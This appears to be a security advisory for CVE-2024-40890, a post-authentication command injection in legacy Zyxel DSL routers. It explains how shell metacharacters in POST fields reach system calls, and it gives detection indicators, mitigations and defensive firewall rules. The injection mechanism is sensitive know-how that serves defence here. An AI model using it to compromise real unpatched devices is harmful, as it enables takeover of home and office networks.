CVE-2024-40890: Zyxel VMG1312-B10A Firmware RCE Vulnerability

CVE-2024-40890 Overview

CVE-2024-40890 is a post-authentication command injection vulnerability affecting legacy Zyxel DSL Customer Premises Equipment (CPE) devices. The flaw resides in the Common Gateway Interface (CGI) program of firmware version 1.00(AAFR.4)C0_20170615 on the Zyxel VMG4325-B10A and related legacy models. An authenticated attacker can send a crafted HTTP POST request to execute arbitrary operating system commands on the affected device. The vulnerability is classified under CWE-78 (Improper Neutralization of Special Elements used in an OS Command). Zyxel has marked the affected products as unsupported when assigned, meaning no security patches will be issued. CISA added this vulnerability to its Known Exploited Vulnerabilities catalog, confirming active in-the-wild exploitation.

Critical Impact

Authenticated attackers can achieve full operating system command execution on end-of-life Zyxel DSL CPE devices. CISA confirms active exploitation, and no vendor patch is available.

Affected Products

• Zyxel VMG series: VMG1312-B10A/B10B/B10E, VMG3312-B10A, VMG3313-B10A, VMG3926-B10B, VMG4325-B10A, VMG4380-B10A, VMG8324-B10A, VMG8924-B10A
• Zyxel SBG series: SBG3300-N000, SBG3300-NB00, SBG3500-N000, SBG3500-NB00
• Affected firmware version: 1.00(AAFR.4)C0_20170615 and related legacy DSL CPE builds

Discovery Timeline

• 2025-02-04 - Zyxel publishes security advisory for legacy DSL CPE command injection
• 2025-02-04 - CVE-2024-40890 published to NVD
• 2025-10-27 - Last updated in NVD database
• CISA KEV - Added to CISA Known Exploited Vulnerabilities catalog

Technical Details for CVE-2024-40890

Vulnerability Analysis

The vulnerability is an OS command injection flaw in a CGI handler within the Zyxel device web management interface. The CGI program processes HTTP POST request parameters and passes attacker-influenced values to an underlying shell or system call without proper input sanitization. By embedding shell metacharacters such as ;, |, `, or $() within crafted POST body fields, an authenticated attacker can break out of the intended command context and execute arbitrary commands as the privileged service account running the CGI.

Because the vulnerable code path executes after authentication, exploitation requires valid credentials. However, the affected models are widely deployed and frequently retain default or weak administrator passwords. A companion advisory from Zyxel also references insecure default credentials in the same legacy CPE line, which lowers the practical barrier to chaining authentication and command execution.

Root Cause

The root cause is improper neutralization of special elements in input passed to OS command interpreters [CWE-78]. The CGI binary concatenates HTTP POST parameter values directly into system command strings invoked through functions such as system(), popen(), or shell-spawning wrappers, with no allowlist, escaping, or argument-array execution.

Attack Vector

An attacker authenticates to the device web interface over HTTP or HTTPS and submits a POST request to the vulnerable CGI endpoint. Parameter values are crafted to contain shell separator characters followed by attacker-supplied commands. The CGI passes the unsanitized string to the OS shell, which interprets and executes the injected payload with the privileges of the web management daemon, typically root on embedded Linux-based CPE firmware. Successful exploitation enables arbitrary file read and write, persistence installation, traffic interception, lateral movement into the internal network, and recruitment of the device into botnets. Refer to the Zyxel Security Advisory for full technical context.

Detection Methods for CVE-2024-40890

Indicators of Compromise

• HTTP POST requests to CGI endpoints on the device management interface containing shell metacharacters (;, |, &, `, $() in parameter values
• Unexpected outbound connections from the CPE device to unknown command-and-control infrastructure
• New or modified files in writable firmware locations and unrecognized processes spawned by the web server daemon
• Authentication events using default or factory credentials immediately followed by POST traffic to management CGIs

Detection Strategies

• Inspect web server and CGI access logs on affected devices for POST requests containing URL-encoded shell metacharacters
• Deploy network intrusion detection signatures that flag command injection patterns targeting Zyxel CGI URIs
• Correlate successful management-plane logins with subsequent anomalous DNS lookups or outbound connections from the device
• Baseline expected CPE behavior and alert on deviations such as new listening ports, shell processes, or cron entries

Monitoring Recommendations

• Forward CPE syslog and firewall logs to a centralized analytics platform for retention and correlation
• Monitor for ingress traffic from the WAN to the device HTTP/HTTPS management interface, which should generally be disabled
• Alert on any administrative authentication from non-corporate or geo-anomalous source addresses
• Track CISA KEV catalog updates to maintain awareness of active exploitation campaigns targeting these models

How to Mitigate CVE-2024-40890

Immediate Actions Required

• Identify and inventory all legacy Zyxel DSL CPE devices listed in the affected products section across the environment
• Disable WAN-side access to the device web management interface and restrict LAN management to a dedicated administrative VLAN
• Replace default and weak administrator credentials with strong, unique passwords on every affected device
• Plan and execute replacement of end-of-life Zyxel CPE hardware with currently supported models that receive security updates

Patch Information

No patch is available. Zyxel has confirmed that the affected legacy DSL CPE models are unsupported and will not receive a fix. The vendor advisory recommends replacement with supported equipment. See the Zyxel Security Advisory and the CISA Known Exploited Vulnerabilities Catalog entry for authoritative guidance.

Workarounds

• Block inbound TCP 80 and 443 to the device WAN interface using upstream firewall rules until replacement is complete
• Place affected CPE devices behind a network segmentation boundary that prevents pivoting into corporate or operational networks
• Disable remote management features and any UPnP or TR-069 services that expose management functionality externally
• Rotate all administrative credentials and audit account lists to remove unused or vendor-default accounts

# Example: block inbound management access to legacy CPE from upstream firewall
iptables -A FORWARD -p tcp -d <CPE_WAN_IP> --dport 80 -j DROP
iptables -A FORWARD -p tcp -d <CPE_WAN_IP> --dport 443 -j DROP
iptables -A FORWARD -p tcp -d <CPE_WAN_IP> --dport 7547 -j DROP